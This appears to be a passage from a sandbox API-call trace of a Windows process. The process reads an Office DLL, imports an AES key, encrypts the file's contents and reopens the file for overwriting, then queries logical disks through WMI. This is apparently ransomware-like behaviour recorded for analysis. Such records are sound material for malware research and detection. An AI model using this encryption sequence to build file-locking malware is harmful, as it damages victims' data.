ftLastWriteTime.dwLowDateTime=0x723f8e00, ftLastWriteTime.dwHighDateTime=0x1c2e156, nFileSizeHigh=0x0, nFileSizeLow=0xfa60)) returned 1 [0169.611] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed70) returned 1 [0169.611] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL", nBufferLength=0x105, lpBuffer=0x6d8e7b4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL", lpFilePart=0x0) returned 0x47 [0169.611] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8eca8) returned 1 [0169.612] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x208 [0169.612] GetFileType (hFile=0x208) returned 0x1 [0169.612] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8eca4) returned 1 [0169.612] GetFileType (hFile=0x208) returned 0x1 [0169.612] GetFileSize (in: hFile=0x208, lpFileSizeHigh=0x6d8edb0 | out: lpFileSizeHigh=0x6d8edb0*=0x0) returned 0xfa60 [0169.612] ReadFile (in: hFile=0x208, lpBuffer=0x376fbc0, nNumberOfBytesToRead=0xfa60, lpNumberOfBytesRead=0x6d8ed5c, lpOverlapped=0x0 | out: lpBuffer=0x376fbc0*, lpNumberOfBytesRead=0x6d8ed5c*=0xfa60, lpOverlapped=0x0) returned 1 [0169.668] CloseHandle (hObject=0x208) returned 1 [0169.668] CryptAcquireContextW (in: phProv=0x6d8ecfc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6d8ecfc*=0xb1e730) returned 1 [0169.669] CryptGenRandom (in: hProv=0xb1e730, dwLen=0x10, pbBuffer=0x377f974 | out: pbBuffer=0x377f974) returned 1 [0170.707] CryptImportKey (in: hProv=0xb1e730, pbData=0x383e324, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6d8eccc | out: phKey=0x6d8eccc*=0xb7f9d0) returned 1 [0170.707] CryptContextAddRef (hProv=0xb1e730, pdwReserved=0x0, dwFlags=0x0) returned 1 [0170.707] CryptContextAddRef (hProv=0xb1e730, pdwReserved=0x0, dwFlags=0x0) returned 1 [0170.707] CryptDuplicateKey (in: hKey=0xb7f9d0, pdwReserved=0x0, dwFlags=0x0, phKey=0x6d8ecbc | out: phKey=0x6d8ecbc*=0xb7f6d0) returned 1 [0170.707] CryptContextAddRef (hProv=0xb1e730, pdwReserved=0x0, dwFlags=0x0) returned 1 [0170.707] CryptSetKeyParam (hKey=0xb7f6d0, dwParam=0x4, pbData=0x383e404*=0x1, dwFlags=0x0) returned 1 [0170.708] CryptSetKeyParam (hKey=0xb7f6d0, dwParam=0x1, pbData=0x383e3d0, dwFlags=0x0) returned 1 [0170.708] CryptEncrypt (in: hKey=0xb7f6d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x383e414*, pdwDataLen=0x6d8ed28*=0xfa70, dwBufLen=0xfa70 | out: pbData=0x383e414*, pdwDataLen=0x6d8ed28*=0xfa70) returned 1 [0170.709] CryptEncrypt (in: hKey=0xb7f6d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x384dea8*, pdwDataLen=0x6d8ed30*=0x0, dwBufLen=0x10 | out: pbData=0x384dea8*, pdwDataLen=0x6d8ed30*=0x10) returned 1 [0170.711] CryptDestroyKey (hKey=0xb7f9d0) returned 1 [0170.711] CryptReleaseContext (hProv=0xb1e730, dwFlags=0x0) returned 1 [0170.711] CryptReleaseContext (hProv=0xb1e730, dwFlags=0x0) returned 1 [0170.711] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL", nBufferLength=0x105, lpBuffer=0x6d8e7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL", lpFilePart=0x0) returned 0x47 [0170.711] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ec94) returned 1 [0170.711] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x320 [0170.712] GetFileType (hFile=0x320) returned 0x1 [0170.712] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ec90) returned 1 [0170.712] GetFileType (hFile=0x320) returned 0x1 [0170.712] WriteFile (in: hFile=0x320, lpBuffer=0x384e4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x6d8ed24, lpOverlapped=0x0 | out: lpBuffer=0x384e4cc*, lpNumberOfBytesWritten=0x6d8ed24*=0x20, lpOverlapped=0x0) returned 1 [0170.713] CloseHandle (hObject=0x320) returned 1 [0170.713] CoTaskMemAlloc (cb=0x20c) returned 0x66ca998 [0170.713] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x66ca998 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0170.713] CoTaskMemFree (pv=0x66ca998) [0170.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6d8e788, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0170.713] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ecd0 | out: ppv=0x6d8ecd0*=0xb51e34) returned 0x0 [0170.714] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ecc8 | out: pAptType=0x6d8ecc8*=1) returned 0x0 [0170.714] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8eccc | out: ppvObject=0x6d8eccc*=0x0) returned 0x80004002 [0170.714] IUnknown:Release (This=0xb51e34) returned 0x1 [0170.715] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e638 | out: ppv=0x6d8e638*=0x6027720) returned 0x0 [0170.715] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027720, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e850 | out: ppvObject=0x6d8e850*=0x0) returned 0x80004002 [0170.715] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027720, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e864 | out: ppvObject=0x6d8e864*=0x6030da0) returned 0x0 [0170.715] WbemDefPath:IUnknown:Release (This=0x6027720) returned 0x0 [0170.715] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030da0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e484 | out: ppvObject=0x6d8e484*=0x6030da0) returned 0x0 [0170.715] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030da0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e440 | out: ppvObject=0x6d8e440*=0x0) returned 0x80004002 [0170.715] WbemDefPath:IUnknown:AddRef (This=0x6030da0) returned 0x3 [0170.715] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030da0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8dd9c | out: ppvObject=0x6d8dd9c*=0x0) returned 0x80004002 [0170.715] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030da0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dd4c | out: ppvObject=0x6d8dd4c*=0x0) returned 0x80004002 [0170.715] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030da0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dd58 | out: ppvObject=0x6d8dd58*=0x66ce448) returned 0x0 [0170.715] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ce448, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8dd60 | out: pCid=0x6d8dd60*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0170.715] WbemDefPath:IUnknown:Release (This=0x66ce448) returned 0x3 [0170.715] CoGetContextToken (in: pToken=0x6d8ddb8 | out: pToken=0x6d8ddb8) returned 0x0 [0170.716] CoGetContextToken (in: pToken=0x6d8e1c0 | out: pToken=0x6d8e1c0) returned 0x0 [0170.716] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030da0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e250 | out: ppvObject=0x6d8e250*=0x0) returned 0x80004002 [0170.716] WbemDefPath:IUnknown:Release (This=0x6030da0) returned 0x2 [0170.716] WbemDefPath:IUnknown:Release (This=0x6030da0) returned 0x1 [0170.716] CoGetContextToken (in: pToken=0x6d8eb48 | out: pToken=0x6d8eb48) returned 0x0 [0170.716] CoGetContextToken (in: pToken=0x6d8eaa8 | out: pToken=0x6d8eaa8) returned 0x0 [0170.716] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030da0, riid=0x6d8eb78*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6d8eb74 | out: ppvObject=0x6d8eb74*=0x6030da0) returned 0x0 [0170.716] WbemDefPath:IUnknown:AddRef (This=0x6030da0) returned 0x3 [0170.716] WbemDefPath:IUnknown:Release (This=0x6030da0) returned 0x2 [0170.716] WbemDefPath:IWbemPath:SetText (This=0x6030da0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0170.716] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030da0, puCount=0x6d8ecfc | out: puCount=0x6d8ecfc*=0x0) returned 0x0 [0170.716] WbemDefPath:IWbemPath:GetText (in: This=0x6030da0, lFlags=2, puBuffLength=0x6d8ecf8*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ecf8*=0x20, pszText=0x0) returned 0x0 [0170.716] WbemDefPath:IWbemPath:GetText (in: This=0x6030da0, lFlags=2, puBuffLength=0x6d8ecf8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ecf8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0170.716] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030da0, uRequestedInfo=0x0, puResponse=0x6d8ed04 | out: puResponse=0x6d8ed04*=0xc19) returned 0x0 [0170.716] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030da0, puCount=0x6d8ecfc | out: puCount=0x6d8ecfc*=0x0) returned 0x0 [0170.716] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030da0, uRequestedInfo=0x0, puResponse=0x6d8ed04 | out: puResponse=0x6d8ed04*=0xc19) returned 0x0 [0170.716] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030da0, uRequestedInfo=0x0, puResponse=0x6d8ed04 | out: puResponse=0x6d8ed04*=0xc19) returned 0x0 [0170.716] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030da0, puCount=0x6d8ec7c | out: puCount=0x6d8ec7c*=0x0) returned 0x0 [0170.716] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x6d8ec68 | out: puCount=0x6d8ec68*=0x2) returned 0x0 [0170.716] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6d8ec64*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ec64*=0xf, pszText=0x0) returned 0x0 [0170.716] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6d8ec64*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ec64*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0170.717] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ec18 | out: ppv=0x6d8ec18*=0xb51e34) returned 0x0 [0170.717] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ec10 | out: pAptType=0x6d8ec10*=1) returned 0x0 [0170.717] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ec14 | out: ppvObject=0x6d8ec14*=0x0) returned 0x80004002 [0170.717] IUnknown:Release (This=0xb51e34) returned 0x1 [0170.718] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e580 | out: ppv=0x6d8e580*=0x6027740) returned 0x0 [0170.718] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027740, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e798 | out: ppvObject=0x6d8e798*=0x0) returned 0x80004002 [0170.718] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027740, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e7ac | out: ppvObject=0x6d8e7ac*=0x6030e10) returned 0x0 [0170.718] WbemDefPath:IUnknown:Release (This=0x6027740) returned 0x0 [0170.718] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030e10, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e3cc | out: ppvObject=0x6d8e3cc*=0x6030e10) returned 0x0 [0170.718] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030e10, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e388 | out: ppvObject=0x6d8e388*=0x0) returned 0x80004002 [0170.718] WbemDefPath:IUnknown:AddRef (This=0x6030e10) returned 0x3 [0170.718] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030e10, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8dce4 | out: ppvObject=0x6d8dce4*=0x0) returned 0x80004002 [0170.718] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030e10, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dc94 | out: ppvObject=0x6d8dc94*=0x0) returned 0x80004002 [0170.718] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030e10, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dca0 | out: ppvObject=0x6d8dca0*=0xbdf000) returned 0x0 [0170.719] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdf000, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8dca8 | out: pCid=0x6d8dca8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0170.719] WbemDefPath:IUnknown:Release (This=0xbdf000) returned 0x3 [0170.719] CoGetContextToken (in: pToken=0x6d8dd00 | out: pToken=0x6d8dd00) returned 0x0 [0170.719] CoGetContextToken (in: pToken=0x6d8e108 | out: pToken=0x6d8e108) returned 0x0 [0170.719] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030e10, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e198 | out: ppvObject=0x6d8e198*=0x0) returned 0x80004002 [0170.719] WbemDefPath:IUnknown:Release (This=0x6030e10) returned 0x2 [0170.719] WbemDefPath:IUnknown:Release (This=0x6030e10) returned 0x1 [0170.719] CoGetContextToken (in: pToken=0x6d8ea90 | out: pToken=0x6d8ea90) returned 0x0 [0170.719] CoGetContextToken (in: pToken=0x6d8e9f0 | out: pToken=0x6d8e9f0) returned 0x0 [0170.719] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030e10, riid=0x6d8eac0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6d8eabc | out: ppvObject=0x6d8eabc*=0x6030e10) returned 0x0 [0170.719] WbemDefPath:IUnknown:AddRef (This=0x6030e10) returned 0x3 [0170.719] WbemDefPath:IUnknown:Release (This=0x6030e10) returned 0x2 [0170.719] WbemDefPath:IWbemPath:SetText (This=0x6030e10, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0170.719] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030e10, puCount=0x6d8ec40 | out: puCount=0x6d8ec40*=0x2) returned 0x0 [0170.719] WbemDefPath:IWbemPath:GetText (in: This=0x6030e10, lFlags=4, puBuffLength=0x6d8ec3c*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ec3c*=0xf, pszText=0x0) returned 0x0 [0170.719] WbemDefPath:IWbemPath:GetText (in: This=0x6030e10, lFlags=4, puBuffLength=0x6d8ec3c*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ec3c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0170.719] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ec40 | out: ppv=0x6d8ec40*=0xb51e34) returned 0x0 [0170.719] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ec38 | out: pAptType=0x6d8ec38*=1) returned 0x0 [0170.719] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ec3c | out: ppvObject=0x6d8ec3c*=0x0) returned 0x80004002 [0170.719] IUnknown:Release (This=0xb51e34) returned 0x1 [0170.720] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e860 | out: ppv=0x6d8e860*=0x6023c30) returned 0x0 [0170.720] WbemLocator:IUnknown:QueryInterface (in: This=0x6023c30, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8ea78 | out: ppvObject=0x6d8ea78*=0x0) returned 0x80004002 [0170.720] WbemLocator:IClassFactory:CreateInstance (in: This=0x6023c30, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea8c | out: ppvObject=0x6d8ea8c*=0x6027750) returned 0x0 [0170.720] WbemLocator:IUnknown:Release (This=0x6023c30) returned 0x0 [0170.720] WbemLocator:IUnknown:QueryInterface (in: This=0x6027750, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e6ac | out: ppvObject=0x6d8e6ac*=0x6027750) returned 0x0 [0170.720] WbemLocator:IUnknown:QueryInterface (in: This=0x6027750, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e668 | out: ppvObject=0x6d8e668*=0x0) returned 0x80004002 [0170.721] WbemLocator:IUnknown:AddRef (This=0x6027750) returned 0x3 [0170.721] WbemLocator:IUnknown:QueryInterface (in: This=0x6027750, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8dfc4 | out: ppvObject=0x6d8dfc4*=0x0) returned 0x80004002 [0170.721] WbemLocator:IUnknown:QueryInterface (in: This=0x6027750, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8df74 | out: ppvObject=0x6d8df74*=0x0) returned 0x80004002 [0170.721] WbemLocator:IUnknown:QueryInterface (in: This=0x6027750, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8df80 | out: ppvObject=0x6d8df80*=0x0) returned 0x80004002 [0170.721] CoGetContextToken (in: pToken=0x6d8dfe0 | out: pToken=0x6d8dfe0) returned 0x0 [0170.721] CoGetContextToken (in: pToken=0x6d8e3e8 | out: pToken=0x6d8e3e8) returned 0x0 [0170.721] WbemLocator:IUnknown:QueryInterface (in: This=0x6027750, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e478 | out: ppvObject=0x6d8e478*=0x0) returned 0x80004002 [0170.721] WbemLocator:IUnknown:Release (This=0x6027750) returned 0x2 [0170.721] WbemLocator:IUnknown:Release (This=0x6027750) returned 0x1 [0170.721] CoGetContextToken (in: pToken=0x6d8ea58 | out: pToken=0x6d8ea58) returned 0x0 [0170.721] CoGetContextToken (in: pToken=0x6d8e9b8 | out: pToken=0x6d8e9b8) returned 0x0 [0170.721] WbemLocator:IUnknown:QueryInterface (in: This=0x6027750, riid=0x6d8ea88*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6d8ea84 | out: ppvObject=0x6d8ea84*=0x6027750) returned 0x0 [0170.721] WbemLocator:IUnknown:AddRef (This=0x6027750) returned 0x3 [0170.721] WbemLocator:IUnknown:Release (This=0x6027750) returned 0x2 [0170.721] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030e10, puCount=0x6d8ec1c | out: puCount=0x6d8ec1c*=0x2) returned 0x0 [0170.721] WbemDefPath:IWbemPath:GetText (in: This=0x6030e10, lFlags=8, puBuffLength=0x6d8ec18*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ec18*=0xf, pszText=0x0) returned 0x0 [0170.721] WbemDefPath:IWbemPath:GetText (in: This=0x6030e10, lFlags=8, puBuffLength=0x6d8ec18*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ec18*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0170.721] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6d8eaf4 | out: 